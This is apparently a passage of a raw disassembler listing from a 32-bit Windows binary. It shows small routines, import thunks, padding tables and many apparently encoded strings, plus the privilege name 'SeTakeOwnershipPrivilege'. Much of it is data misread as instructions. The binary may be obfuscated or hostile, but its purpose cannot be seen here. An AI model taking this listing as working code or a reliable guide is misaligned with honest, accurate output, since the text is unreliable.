var_FFC = dword ptr -0FFCh
pop ecx
loc_425D5E: ; CODE XREF: sub_425D5D+14�j
sub esp, 1000h
sub eax, 1000h
test [esp+0FFCh+var_FFC], eax
cmp eax, 1000h
jnb short loc_425D5E
sub esp, eax
test [esp+0FFCh+var_FFC], eax
jmp ecx
sub_425D5D endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
db 0
; =============== S U B R O U T I N E =======================================
sub_425D7D proc near ; CODE XREF: sub_41C22E+28B�p
; sub_41C22E+890�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_4]
xor eax, eax
mov ecx, 0FFFFFFFFh
xchg edi, edx
repne scasb
neg ecx
lea ecx, [ecx-1]
mov eax, [esp+arg_4]
xchg eax, esi
mov edi, [esp+arg_0]
rep movsb
xchg eax, esi
xchg edx, edi
mov eax, [esp+arg_0]
retn 8
sub_425D7D endp
; ---------------------------------------------------------------------------
align 4
dd 0AC25FF00h, 90100160h, 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_425DB5 proc near ; CODE XREF: sub_41A669+10�p
jmp dword ptr ds:100160B0h
sub_425DB5 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
align 10h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_425DC1 proc near ; CODE XREF: sub_41A48D+13�p
jmp dword ptr ds:100160B4h
sub_425DC1 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
align 4
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_425DCD proc near ; CODE XREF: sub_41A5D0+33�p
; sub_41A5D0+45�p ...
jmp dword ptr ds:100160C0h
sub_425DCD endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
align 4
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_425DD9 proc near ; CODE XREF: sub_41A5D0+B�p
; sub_41A5D0+17�p ...
jmp dword ptr ds:100160C4h
sub_425DD9 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
align 4
dd 0C825FF00h, 90100160h, 90h, 0CC25FF00h, 90100160h, 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_425DFD proc near ; CODE XREF: sub_41A669+4E�p
; sub_41A669+87�p
jmp dword ptr ds:100160D0h
sub_425DFD endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
align 4
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_425E09 proc near ; CODE XREF: .data:0041A593�p
jmp dword ptr ds:100160D4h
sub_425E09 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
align 4
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_425E15 proc near ; CODE XREF: sub_41A5D0+71�p
; sub_41A5D0+86�p
jmp dword ptr ds:100160D8h
sub_425E15 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
align 10h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_425E21 proc near ; CODE XREF: sub_41A669+9E�p
jmp dword ptr ds:100160DCh
sub_425E21 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
align 4
dd 78h dup(0)
dd 0C91400h, 10h, 4 dup(0)
dd 732500h, 72007700h, 1Ch dup(0)
dd 500h, 200h, 500h, 2 dup(100h), 900h, 400h, 500h, 900h
dd 400h, 900h, 200h, 400h, 900h, 200h, 600h, 100h, 0
dd 500h, 0
dd 2 dup(200h), 400h, 600h, 0
dd 700h, 100h, 2 dup(700h), 400h, 900h, 2 dup(0)
dd 900h, 600h, 400h, 900h, 200h, 500h, 800h, 200h, 400h
dd 500h, 800h, 2 dup(900h), 0
dd 800h, 200h, 300h, 800h, 0
dd 600h, 400h, 900h, 200h, 500h, 200h, 500h, 900h, 500h
dd 100h, 900h, 100h, 500h, 3 dup(900h), 0
dd 100h, 800h, 500h, 700h, 400h, 500h, 300h, 900h, 100h
dd 200h, 100h, 2 dup(500h), 300h, 900h, 2 dup(100h), 700h
dd 600h, 200h, 300h, 600h, 400h, 3 dup(600h), 700h, 600h
dd 100h, 900h, 600h, 700h, 500h, 2 dup(400h), 700h, 300h
dd 900h, 500h, 0
dd 900h, 0
dd 900h, 0Bh dup(0)
dd 15B9F00h, 10h, 2 dup(0)
dd 0E86000h, 61000000h, 0E9h, 0
dd 1100h, 0Fh dup(0)
db 0
db 0A5h, 0EEh, 0F7h
db 0E1h ; á
db 2Ch, 7Eh, 0FDh
db 0BFh ; ¿
db 7Fh, 0E8h, 9Ah
dd 24408286h, 6ADDE2CCh
db 0D7h ; ×
db 2 dup(0E1h), 77h
db 1Bh
db 0B0h, 15h, 52h
db 50h ; P
db 56h, 64h, 4Bh
db 0D2h ; Ò
db 6Bh, 7Ch, 35h
db 3Dh ; =
db 0D5h, 85h, 0Eh
db 28h ; (
db 0F9h, 51h, 0B0h
db 1Ah
db 44h, 87h, 4Eh
db 1Eh
db 0DFh, 0CCh, 83h
db 0E3h ; ã
db 37h, 47h, 3Dh
db 32h ; 2
db 18h, 5, 0F8h
db 14h
db 0BFh, 37h, 6
db 6Eh ; n
align 4
db 0
db 0BDh, 25h, 0
db 10h
db 0ADh, 0B3h, 0
db 10h
db 1Eh, 23h, 0
db 10h
db 84h, 80h, 0
db 10h
db 0FAh, 2Bh, 0
db 10h
db 6, 0B5h, 0
db 10h
db 0B9h, 58h, 0
db 10h
align 4
db 0
db 24h, 13h, 0
db 10h
db 75h, 0A1h, 0
db 10h
db 0CDh, 91h, 0
db 10h
db 0FEh, 0B4h, 0
db 10h
db 0F6h, 0B4h, 0
db 10h
db 1Fh, 0BAh, 0
db 10h
db 0DFh, 26h, 0
db 10h
db 40h, 43h, 1
db 10h
align 10h
db 0
db 0Ch, 7Ch, 0
db 10h
db 0BAh, 0ACh, 0
db 10h
db 87h, 7Ch, 0
db 10h
db 51h, 1Fh, 0
db 10h
db 0C7h, 52h, 0
db 10h
db 5Ch, 17h, 0
db 10h
db 0Ah, 1Eh, 0
db 10h
db 64h, 43h, 1
db 10h
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3Eh, 2 dup(0)
db 0
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3Fh, 2 dup(0)
db 0
db 34h, 2 dup(0)
db 0
db 35h, 2 dup(0)
db 0
db 36h, 2 dup(0)
db 0
db 37h, 2 dup(0)
db 0
db 38h, 2 dup(0)
db 0
db 39h, 2 dup(0)
db 0
db 3Ah, 2 dup(0)
db 0
db 3Bh, 2 dup(0)
db 0
db 3Ch, 2 dup(0)
db 0
db 3Dh, 2 dup(0)
db 0
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
align 4
db 0
db 1, 2 dup(0)
db 0
db 2, 2 dup(0)
db 0
db 3, 2 dup(0)
db 0
db 4, 2 dup(0)
db 0
db 5, 2 dup(0)
db 0
db 6, 2 dup(0)
db 0
db 7, 2 dup(0)
db 0
db 8, 2 dup(0)
db 0
db 9, 2 dup(0)
db 0
db 0Ah, 2 dup(0)
db 0
db 0Bh, 2 dup(0)
db 0
db 0Ch, 2 dup(0)
db 0
db 0Dh, 2 dup(0)
db 0
db 0Eh, 2 dup(0)
db 0
db 0Fh, 2 dup(0)
db 0
db 10h, 2 dup(0)
db 0
db 11h, 2 dup(0)
db 0
db 12h, 2 dup(0)
db 0
db 13h, 2 dup(0)
db 0
db 14h, 2 dup(0)
db 0
db 15h, 2 dup(0)
db 0
db 16h, 2 dup(0)
db 0
db 17h, 2 dup(0)
db 0
db 18h, 2 dup(0)
db 0
db 19h, 2 dup(0)
db 0
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 1Ah, 2 dup(0)
db 0
db 1Bh, 2 dup(0)
db 0
db 1Ch, 2 dup(0)
db 0
db 1Dh, 2 dup(0)
db 0
db 1Eh, 2 dup(0)
db 0
db 1Fh, 2 dup(0)
db 0
db 20h, 2 dup(0)
db 0
db 21h, 2 dup(0)
db 0
db 22h, 2 dup(0)
db 0
db 23h, 2 dup(0)
db 0
db 24h, 2 dup(0)
db 0
db 25h, 2 dup(0)
db 0
db 26h, 2 dup(0)
db 0
db 27h, 2 dup(0)
db 0
db 28h, 2 dup(0)
db 0
db 29h, 2 dup(0)
db 0
db 2Ah, 2 dup(0)
db 0
db 2Bh, 2 dup(0)
db 0
db 2Ch, 2 dup(0)
db 0
db 2Dh, 2 dup(0)
db 0
db 2Eh, 2 dup(0)
db 0
db 2Fh, 2 dup(0)
db 0
db 30h, 2 dup(0)
db 0
db 31h, 2 dup(0)
db 0
db 32h, 2 dup(0)
db 0
db 33h, 2 dup(0)
db 0
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
; ---------------------------------------------------------------------------
jmp fword ptr [edi+27B41000h]
; ---------------------------------------------------------------------------
align 4
db 10h
db 0F5h, 27h, 0
db 10h
db 30h, 28h, 0
db 10h
aCreatethread_1 db 'CreateThread',0
aEntercritica_0 db 'EnterCriticalSection',0
aInitializecr_0 db 'InitializeCriticalSection',0
aLeavecritica_0 db 'LeaveCriticalSection',0
align 4
db 0
db 0Bh,0
aSitdrfanjIe db 'ᨒ¤”€¦´¨¥',0
db 0Eh
align 2
dw 0D192h
db 0FDh ; ý
db 0C7h, 0FCh, 0FBh
db 0FCh ; ü
db 0FBh, 0E6h, 0FBh
db 0F3h ; ó
db 0FEh, 0FBh, 0E8h
db 0F7h ; ÷
align 2
dw 0Ch
db 37h ; 7
db 74h, 58h, 7Eh
db 59h ; Y
db 5Eh, 43h, 5Eh
db 56h ; V
db 5Bh, 5Eh, 4Dh
db 52h ; R
align 2
dw 10h
db 0FCh ; ü
aUOsaisTpiatqs db '¿“¿Ž™ˆ™µ’ˆ’Ÿ™',0
dw 0Fh
aSvnIezuomXuipj db 'ᢲ¨¥§“ŽŒ²•“ˆ†',0
db 9,0
db 94h
db 0FBh ; û
db 0F8h, 0F1h, 0A7h
db 0A6h ; ¦
db 0BAh, 0F0h, 0F8h
db 0F8h ; ø
align 2
dw 9
db 51h ; Q
db 3Eh, 3Dh, 34h
db 62h ; b
db 63h, 7Fh, 35h
db 3Dh ; =
db 3Dh, 0, 1
db 0
db 20h, 7Ch, 0
db 13h
align 2
aIKsMnSK db 'Þ‰¿·ª˜±¬·°¹²»‘¼´»½ª',0
db 10h
db 0
db 3Eh, 79h, 5Bh
db 4Ah ; J
db 7Dh, 51h, 53h
db 4Eh ; N
db 4Bh, 4Ah, 5Bh
db 4Ch ; L
db 70h, 5Fh, 53h
db 5Bh ; [
db 7Fh, 0, 16h
db 0
db 76h, 31h, 13h
db 2
db 33h, 18h, 0
db 1Fh
db 4, 19h, 18h
db 1Bh
db 13h, 18h, 2
db 25h ; %
db 2, 4, 1Fh
db 18h
db 11h, 5, 37h
db 0
db 17h, 0, 18h
db 5Eh ; ^
db 6Ah, 2 dup(7Dh)
db 5Dh ; ]
db 76h, 6Eh, 71h
db 6Ah ; j
db 77h, 76h, 75h
db 7Dh ; }
db 76h, 6Ch, 4Bh
db 6Ch ; l
; ---------------------------------------------------------------------------
push 71h
jbe short loc_426948
imul ebx, [ecx+0], 12h
add [ebx], ah
db 64h
inc esi
push edi
pusha
push esi
push ecx
push ecx
inc esi
dec ebp
push edi
ja short loc_426926
push ecx
inc esi
inc edx
inc edi
push 47h
add [ebx], dl
add [edx+5], al
daa
add ss:[edi], esi
xor [eax], dh
daa
sub al, 36h
adc dh, [eax]
sub eax, 31312721h
or esp, [esi]
add [ebx], cl
add [ecx-303B2E12h], ah
icebp
ror esi, cl
retn 0D2C4h
; ---------------------------------------------------------------------------
dw 0D2h
dd 6720000Eh, 4F6C5445h, 454C4143h, 4F464E69h, 0D0061h
dd 7E6F4D0Ah, 79786F5Ch
db 63h, 65h
; ---------------------------------------------------------------------------
loc_426926: ; CODE XREF: .data:004268D9�j
db 64h
dec edi
jb short near ptr loc_426971+4
add [eax+eax], dl
ficomp dword ptr [ebx+esi*4-4C71404Ah]
mov bh, 0BFh
; ---------------------------------------------------------------------------
dw 0B58Eh
dd 0AEA9A389h, 0B38EB7BFh, 0F00BFB7h, 321E5D00h
; ---------------------------------------------------------------------------
loc_426948: ; CODE XREF: .data:004268C7�j
xor ds:1B382F3Ch, ch
xor al, 31h
cmp [ecx], cl
xor al, 30h
cmp [eax], al
adc eax, 0B99BDC00h
test al, 8Ah
mov bl, 0B0h
test eax, 0B295B9B1h
mov edx, 0BDB1AEB3h
test al, 0B5h
mov bl, 0B2h
popf
add [eax+eax], dl
loc_426971: ; CODE XREF: .data:00426928�j
push 0D1C0621h
sbb al, [edi+eax]
or eax, [ebx]
or eax, 0B0D2C0Ch
sbb cl, ds:1C060D05h
add [eax+eax], dl
db 66h
das
or [edx], dl
add edx, [edx+ecx]
or ds:2F02030Dh, eax
or ds:30B0314h, al
or [edx], dl
add [ebx], dl
add [ebx], cl
dec esp
outsb
jg short near ptr loc_4269FD+1
jb short near ptr loc_426A1F+1
jg short loc_426A18
dec di
bound edi, [ecx+6Eh]
push 7279647Fh
dec edx
add [edx], dl
add [edi], ch
push 40625B4Ah
dec ebx
pop edx
inc ebx
dec edx
imul eax, [esi+43h], 424E614Ah
dec edx
outsb
add [edx], cl
add [eax], bh
ja short loc_426A19
pop ebp
push esi
jnz short near ptr loc_426A1F+3
dec esp
pop ebp
inc eax
jns short $+2
or al, 0
mov edx, ecx
sti
in al, dx
call near ptr 0FD0756E2h
std
in al, dx
icebp
enter 900h, 0
push 1118072Bh
add cs:110029h[ecx], eax
jno short loc_426A31
adc al, 5
loc_4269FD: ; CODE XREF: .data:004269A4�j
xor eax, 371A0218h
add edx, [esp+edx]
and al, [ecx]
adc [edx], dl
adc al, 30h
add [eax+eax], cl
mov ds:0E6D7C6F0h, eax
rcl ecx, 1
int 3 ; Trap to Debugger
shr esi, 1
loc_426A18: ; CODE XREF: .data:004269A8�j
int 3 ; Trap to Debugger
loc_426A19: ; CODE XREF: .data:004269CF�j
mov esi, 0EE001100h
loc_426A1F: ; CODE XREF: .data:004269A6�j
; .data:004269D3�j
test eax, 96AB9A8Bh
xchg ebx, [edx-74757E53h]
mov edx, 8F8B9C86h
mov al, [eax]
loc_426A31: ; CODE XREF: .data:004269F9�j
or eax, 26044300h
aaa
pop es
xor [edx], ebp
xor eax, 333A1726h
add al, es:[eax]
or [eax], eax
sbb al, 5Ah
jnz short near ptr loc_426AB9+1
js short loc_426AA9
jo short near ptr loc_426ABD+2
outsd
jns short $+2
or eax, 1D327400h
sbb dl, [eax]
cmp dl, [ecx]
or al, 0
xor bl, ds:351118h
push cs
add [eax+16h], dl
cmp [esi], edi
xor al, 16h
cmp [edx], esp
and esp, [esi+edx]
cmp ds:0C0011h[esi], edi
retn
; ---------------------------------------------------------------------------
db 84h, 0A6h, 0B7h
dd 0A8A0AA97h, 0ADB6AC80h, 0D00B7h, 657D5B09h, 667B6C53h
dd 66646C44h, 0D00707Bh, 83A1E600h, 959FB592h, 0B28B8392h
dd 838B8Fh, 0ABE70009h
db 88h
; ---------------------------------------------------------------------------
loc_426AA9: ; CODE XREF: .data:00426A48�j
test [esi-7D6A5E75h], al
add byte ptr [eax], 0Ah
add [ebp-0B090527h], dl
stc
loc_426AB9: ; CODE XREF: .data:00426A46�j
aam 0F9h
stc
cli
loc_426ABD: ; CODE XREF: .data:00426A4A�j
test byte ptr [eax], 0Bh
add [edx+edx+2Dh], al
xor ss:[ecx], dh
and eax, 21360228h
and [eax], eax
or al, 0
popa
aaa
or [ebx], dl
adc eax, 200D0014h
or eax, 20E0Dh
or [eax], al
db 66h
xor al, 3
pop es
add ah, [eax]
; ---------------------------------------------------------------------------
dw 0A0Fh
db 3
align 2
dw 0Ch
db 7Bh ; {
db 3Ch, 1Eh, 0Fh
db 2Fh ; /
db 1Eh, 16h, 0Bh
db 2Bh ; +
db 1Ah, 0Fh, 13h
db 3Ah ; :
align 2
dw 12h
db 42h ; B
db 5, 0Eh, 2Dh
db 20h
db 23h, 2Eh, 0Fh
db 27h ; '
db 2Fh, 2Dh, 30h
db 3Bh ; ;
db 11h, 36h, 23h
db 36h ; 6
db 37h, 31h, 0
db 13h
align 2
dw 0B1FCh
aIrixEisiulxssF db '‰ˆ•¾…ˆ™¨“«•˜™¿”Ž',0
db 13h
db 0
db 7Fh, 28h, 16h
db 1Bh
db 1Ah, 3Ch, 17h
db 1Eh
db 0Dh, 2Bh, 10h
db 32h ; 2
db 0Ah, 13h, 0Bh
db 16h
db 3Dh, 6, 0Bh
db 1Ah
align 2
dw 7
db 0CFh ; Ï
db 98h, 0A6h, 0A1h
db 8Ah ; Š
db 0B7h, 0AAh, 0ACh
db 0
db 8, 0, 35h
db 59h ; Y
db 46h, 41h, 47h
db 59h ; Y
db 50h, 5Bh, 62h
db 0
db 0Bh, 0, 69h
db 2Eh ; .
db 0Ch, 1Dh, 2Fh
db 0
db 5, 0Ch, 3Ah
db 0
db 13h, 0Ch, 0
db 0Bh
align 2
dw 5D1Eh
db 72h ; r
db 71h, 6Dh, 7Bh
db 56h ; V
db 7Fh, 70h, 7Ah
db 72h ; r
db 7Bh, 0, 9
db 0
db 63h, 34h, 11h
db 0Ah
db 17h
db 6
db 25h ; %
db 0Ah
db 0Fh
db 6
db 0
db 0Eh
align 2
dw 0D586h
db 0E3h ; ã
db 0F2h, 0C0h, 0EFh
db 0EAh ; ê
db 0E3h, 0D6h, 0E9h
db 0EFh ; ï
db 0E8h, 0F2h, 0E3h
db 0F4h ; ô
align 2
dw 0Bh
db 0FDh ; ý
db 0B9h, 98h, 91h
db 98h ; ˜
db 89h, 98h, 0BBh
db 94h ; ”
db 91h, 98h, 0BCh
db 0
db 0Bh, 0, 7Ch
db 3Fh ; ?
db 0Eh, 19h, 1Dh
db 8
db 19h, 3Ah, 15h
db 10h
db 19h, 3Dh, 0
db 0Ch
align 2
dw 5E12h
db 7Dh ; }
db 73h, 76h, 5Eh
db 7Bh ; {
db 70h, 60h, 73h
db 60h ; `
db 6Bh, 53h, 0
db 10h
align 2
dw 5D1Ah
db 7Fh ;
db 6Eh, 57h, 75h
db 7Eh ; ~
db 6Fh, 76h, 7Fh
db 52h ; R
db 7Bh, 74h, 7Eh
db 76h ; v
db 7Fh, 5Bh, 0
db 4
align 2
dw 0E4A6h
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
dw 0D6h
db 0Ah
align 2
dw 0B5F0h
db 88h ; ˆ
db 99h, 84h, 0A4h
db 98h ; ˜
db 82h, 95h, 91h
db 94h ; ”
align 2
dw 3
db 80h ; €
db 0BBh, 0EFh, 0BDh
db 0
db 4, 0, 23h
db 18h
db 50h, 4Ch, 1Eh
db 0
db 4, 0, 44h
db 7Fh ;
db 20h, 79h, 6Eh
db 0
db 3, 2 dup(0)
db 0
db 0D0h, 0, 99h
db 0
db 9Dh, 0, 97h
db 0
db 2 dup(0), 17h
db 0
aXgxgxgxgaxgxgx db 'Àå£å£å£å£íå£å£å£å£å£î£¯',0
dw 16h
aMMMMMtMMMMs db 'Ïê¬ê¬ê¬ê¬ê¬âê¬ê¬ê¬ê¬á½º',0
db 6
align 2
dw 741Fh
aTn2ig db 'tn2ig',0
db 8,0
db 6Dh ; m
db 48h, 1Eh, 32h
db 0
db 19h, 15h, 48h
db 18h
align 4
db 9Eh ; ž
align 2
dw 1
db 0FAh ; ú
db 82h, 0, 10h
db 0
a4gSq@rXpqfdu@U db '4g|sQ@r[XPQFdU@\u',0
db 0Bh,0
db 71h, 2, 19h
db 14h
db 2 dup(1Dh), 42h
db 43h ; C
db 5Fh, 15h, 1Dh
db 1Dh
align 2
dw 0Bh
db 9Dh ;
db 0EEh, 0F5h, 0F8h
db 0F1h ; ñ
db 0F1h, 0AEh, 0AFh
db 0B3h ; ³
db 0F9h, 2 dup(0F1h)
db 0
db 6, 0, 0F8h
db 8Bh ; ‹
db 8Ch, 8Ah, 9Bh
db 88h ; ˆ
db 81h, 0, 8
db 0
db 73h, 5, 0
db 3
db 1, 1Ah, 1Dh
db 7
db 15h, 0, 7
db 0
db 87h, 0F4h, 0F7h
db 0F5h ; õ
db 0EEh, 0E9h, 0F3h
db 0E1h ; á
align 2
dw 6
db 48h ; H
db 3Bh, 3Ch, 3Ah
db 2Bh ; +
db 29h, 3Ch, 0
db 5
align 2
dw 0ACDFh
db 0ADh ;
db 0BEh, 0B1h, 0BBh
db 0
db 4, 0, 0A4h
db 0D6h ; Ö
db 0C5h, 0CAh, 0C0h
db 0
db 6, 0, 0E2h
db 8Fh ;
db 87h, 8Fh, 91h
db 87h ; ‡
db 96h, 0, 6
db 0
db 0D2h, 0BFh, 0B7h
db 0BFh ; ¿
db 0B1h, 0A2h, 0ABh
db 0
db 6, 0, 93h
db 0FEh ; þ
db 0F6h, 0FEh, 0F0h
db 0FEh ; þ
db 0E3h, 0, 6
db 0
db 14h, 79h, 75h
db 78h ; x
db 78h, 7Bh, 77h
db 0
db 4, 0, 0E6h
db 80h ; €
db 94h, 2 dup(83h)
db 0
db 4, 0, 29h
db 48h ; H
dd offset loc_40465A+3
db 7, 0, 8Dh
db 0F9h ; ù
db 0E2h, 0F8h, 0FDh
db 0FDh ; ý
db 0E8h, 0FFh, 0
db 6
align 2
dw 1F40h
db 33h ; 3
db 2Ch, 2 dup(25h)
db 30h ; 0
align 2
dw 0Ah
db 6
db 65h, 74h, 72h
db 62h ; b
db 2 dup(6Ah), 28h
db 62h ; b
db 2 dup(6Ah), 0
db 0Ah
align 2
dw 0EB88h
db 0FAh ; ú
db 0FCh, 0ECh, 0E4h
db 0E4h ; ä
db 0A6h, 0ECh, 0E4h
db 0E4h ; ä
align 2
aSetakeowners_0 db 'SeTakeOwnershipPrivilege',0
db 12h
dd 83B6E500h, 0A396AC86h, 0B580898Ch, 80918A97h, 81809186h
dd 50000700h, 7E333623h, 3C3C34h, 0D6A50007h, 0C18BC6C3h
dd 0C9C9h, 400h, 70003200h, 76007D00h, 6B00h, 43000100h
dd 40069h, 68686C68h, 0A0068h, 0BFBAAFDCh, 0F2AFB383h
dd 0B0B0B8h, 0A8DB000Ah, 0B484B8BDh, 0B7BFF5A8h, 100B7h
dd 2005925h, 0C894B400h, 15000100h, 4002Fh, 8CDCD9F9h
dd 100C3h, 0A007408h, 6C705000h, 1D021F16h, 6E25756Ah
dd 1C000B00h, 4E5A203Ch, 2659515Dh, 226939h, 0C5E5000Ah
